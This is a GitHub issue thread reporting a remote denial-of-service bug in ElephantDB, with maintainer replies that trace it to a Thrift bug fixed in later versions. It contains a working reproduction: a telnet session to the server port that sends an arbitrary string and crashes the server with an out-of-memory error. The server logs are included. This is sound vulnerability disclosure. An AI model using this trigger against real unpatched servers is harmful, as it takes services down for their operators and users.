### ISSUE TITLE
Remote takedown of ElephantDB

### ISSUE THREAD

**Issue by stucchio** [nathanmarz/elephantdb#1]
I've discovered that it is possible to remotely nuke an ElephantDB server. 

Start an elephant server, in my case on port 3578. Then:

```
$ telnet stylewok-hadoop 3578
Trying 192.168.100.235...
Connected to stylewok-hadoop.
Escape character is '^]'.
please die
^]
```

The result:

11/03/18 05:08:13 INFO elephantdb.log: Cached config {:token "Fri Mar 18 05:08:10 IST 2011", :domains {"itemfeatures" "/elephant/views/itemfeatures"}, :hosts ["stylewok-hadoop" "stylewok-hadoop2"], :replication 2, :port 3578}
11/03/18 05:08:13 INFO elephantdb.log: Finished loading all updated domains from remote
Exception in thread "Thread-8" java.lang.OutOfMemoryError: Java heap space
    at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:39)
    at java.nio.ByteBuffer.allocate(ByteBuffer.java:312)
    at org.apache.thrift.server.TNonblockingServer$FrameBuffer.read(TNonblockingServer.java:537)
    at org.apache.thrift.server.TNonblockingServer$SelectThread.handleRead(TNonblockingServer.java:408)
    at org.apache.thrift.server.TNonblockingServer$SelectThread.select(TNonblockingServer.java:353)
    at org.apache.thrift.server.TNonblockingServer$SelectThread.run(TNonblockingServer.java:297)

A few minutes later:

11/03/18 05:09:13 INFO elephantdb.log: ElephantDB received shutdown notice...
11/03/18 05:09:13 INFO elephantdb.log: Closing LP for itemfeatures/0
11/03/18 05:09:13 INFO elephantdb.log: Closed LP for itemfeatures/0
11/03/18 05:09:13 INFO elephantdb.log: Closing LP for itemfeatures/1
11/03/18 05:09:13 INFO elephantdb.log: Closed LP for itemfeatures/1

(You don't need to type the words "please die", every random string I tried works.)

**Comment by nathanmarz** [comment]
This is the issue you're hitting: https://issues.apache.org/jira/browse/THRIFT-601

The solution is to upgrade Thrift to the latest version which has a fix for this. Unfortunately Thrift isn't backwards compatible so this will take some work.

**Comment by sorenmacbeth** [comment]
elephantdb 0.2.0 uses Thrift 0.8.0, which contains this fix.
